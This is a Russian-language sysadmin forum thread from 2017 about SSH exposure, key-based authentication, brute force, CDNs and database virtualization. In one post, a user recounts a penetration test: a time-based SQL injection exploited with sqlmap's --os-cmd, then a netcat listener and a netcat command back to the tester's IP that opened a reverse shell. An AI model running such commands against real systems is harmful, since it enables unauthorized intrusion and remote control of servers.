Кого же мы вырастили в IT - втыкателей кабелей с "танчиками", или великая сказка про русских айтишников ...

Ну почти, если с лицухами все норм - нафиг брать дедик в Голландии, логично?

Как как... нефиг ip продакшна показывать, cdn рулят (только не клаудфлейр - обойти его может даже ребенок)

Это сообщение отредактировал bimb0 - 21.03.2017 - 23:16

Проблема начинается тогда, когда она торчит не для одного единственного или группы людей, а для всех

железо от сети отключи на которое запросы приходят)))

я вообще хоть и понимаю, как сделать, но никогда не ставлю все в кучу на один физический сервак, да еще чтобы он в мир смотрел. Уж роутер купить не проблема. Причем даже весьма продвинутый стоит не катастрофически дорого, и "железяка" в подавляющем случае оказывается лучше, чем некий комп.

Это сообщение отредактировал vaisman - 21.03.2017 - 23:18

SSH - он вообще такой...
Вот у меня вебхосты. Пара из которых вообще в странах, куда у меня визы нет и хз сколько оформлять :)
И я туда хожу по SSH. И иногда (о ужас!!!) с андроедного телефончика с хз каким IP. И SSH торчит "на весь мир". Сервачки стоят уже годами. Взломов не было. Что я делаю не так?

PS. Ну да, брутфорсят SSH периодически, пару раз даже прям настолько сурово форсили, что мне приходилось иногда ждать очереди вплоть до таймаута SSH на коннекте. Но это никак не отражалось на скорости ответа морды сервака.

Сегодня нет, а завтра тем более. 3.9 скоро на экранах страны. Если 3.8 показала зубы со своими - проверьте легальность, то следующая, кто тестил, подскажет - уже все. Не будет блокировки раз в 15 минут, начнется подмена того самого bin на исходный.

Ну да, так и дверь в дом, даже с замком - дыра.
Надо заложить кирпичом.

Основная проблема - человек.
Криптостойкость SSHv2 достаточна для защиты от прямого взлома протокола, а всяуие брутфорсы и детектятся, да и как-бу неплохо пользоваться SSH keys а не логин/паролем.

Ну примерно так я себе это и представлял © :)

Да сертификат ключ же
отключите вы авторизацию по логину+пассу и все
Как вас брутить будут в таком случае?

Это уже защищен так как если серта ключа нет - коннекта тоже нет
З.Ы. Заболтался я, ключ, а не серт, попутал, извините, сейчас хттпс прикручиваю...

Это сообщение отредактировал bimb0 - 21.03.2017 - 23:26

Так а я о чем?
На текущий момент - это наиболее защищенный вариант удаленного доступа по IP.

и ложись уже спать)))

И mssql и Oracle базы огромных размеров прекрасно гоняются на виртуализации, тут главное тюнинг и хорошую San фабрику потому что базы очень любят iops жрать а без хорошего 3par или extrimeIO щас не одну высоконагруженую базу не погоняешь , только если не завалялось t4 или exadata под это дело. В компании гоняем уже 3-й год оракловые базы на VMware после того как оракл сертифицировал под VMware .
Правда фабрика под это очень дорогая 200tb флешек и около 3 лямов$$$ ну блейды топовые Cisco ucs

Через aptitude, он зависимости лучше разруливает.

Пссс, а кто ему по дешевке продаст ту приблуду от касперыча от ddos? Я могу ценник в 2 млн выставить

Фига се цены
З.Ы. Может ему про фингерпринт посетителей еще рассказать и про geoip базы?

Можно и сертом. Но иногда бывает нужда из слоновьей задницы с чужого компа сунуться. Пару раз впёрся с "а серта нету" и как-то привык на логинах жить. Благо забрутить SSH до хоть какого-то уровня DDOS - это надо нехилую атаку держать. Это ОЧЕНЬ дорого. К тому же даёт лишь отказ самого SSH, что в сущности сводит ситуацию к "а смысл?" :)

А фоновые сканы или бруты с одиночных хостов - это пох. Ну болтается в логах, что постоянно дрочатся 30-50 коннектов. Да и пох. На скорость не влияет.

А за брут я спокоен. Пароли везде - нормальные имена котиков типа Dfyds^7367T%F#iIYGD. Тут только прямой форс лет на хз сколько. Учитывая, что я их ещё и меняю периодически (чаще, чем раз в столетие :) ) - могу тока пожелать удачи пацанам на том конце :)

Вот прям так взял и указал ему, что проблема не в памяти, а в дисковой. Ну зачем? Он бы сам мучался, тесты проводил, научился бы со скулем общаться, всякие видеокурсы просмотрел бы, стал бы гилевым наконец. А ты... эх, еще один сисадмин пропал

У меня где-то был девайс для благословления трафика.

Вы не тюните, а просто валите ломовой производительностью по ощущениям.

У меня всё скромнее пока. 1,5Tb база вполне живёт на 2*Xeon (4core), 64Gb RAM и сраный SAS RAID10.
При этом дольше 2-3 секунд сгребается только сводный отчёт по производству и длинные отчёты за месяц и более (там до 4 минут время формирования).
У нас конторка маленькая, вбухивать лямы зелени в железо смысла нет. А на случай отказа в холодном резерве отдыхает второй сервачок (примерно такой же), ну и подохлее ещё один крутится на горячей подмене.
К сожалению, кластер нормально развернуть низзя - это надо лицензии обновлять на софт (текущая не позволяет кластер на серерной стороне). А это очень до хера бабла. Потом мучаемся и извращаемся как можем. :)

Вы лучше пожелайте удачи парням посередине
Что такое mitm вы можете прочитать в википедии, а как подменяются DNS и что из этого выходит вам лучше и не знать.
З.Ы. Если есть возможность - я полюзую ключи, а если есть возможность использовать еще и двухфакторку - я обязательно ей воспользуюсь

Это сообщение отредактировал bimb0 - 21.03.2017 - 23:35

Возражу. Из своей практики проведения пентеста:
Сайт на PHP + PostgreSQL.
тестил все точки входа - тишина. Не нашел даже XSS.
И только в одном месте Time Based SQL injection, причем до такой степени противный time based - оооочень медленный.
SQLmap с опцией --os-cmd выполнил тестовую команду id
далее было всё намного проще:
на своей машине nc -lvp 3333
на удаленной через sqlmap: nc -nv <мой_IP> 3333
и я имею реверс шелл с удаленного сервера. Далее можно было пробовать локальные эксплойты под ядро, чтобы до root-а подняться, но этого не требовалось.
Кстати хозяин оплатил очень хорошо :)

Это сообщение отредактировал kazanec - 21.03.2017 - 23:37

Хочу тебя расстроить , что брут это далеко не последний способ , можно проэксплойтить и свободно залить тебе Шелл а дальше судьба твоего сервера в базе дедиков за 5$ где-нибудь на форуме. Особенно если ты не привык посылать пару раз в месяц своему серваку yum update. Так что даже 65-ти знак и церты не гарантия

Вы часом не подскажете методику эксплойта sshd?

Не поминай Гилёва :)
А то щас до 1С скатимся :)

andysh888
Как база на 1,5 Терра, сука, байт у тебя на 64 гб памяти?
Вот ты кто? Сказочник или доколе уже...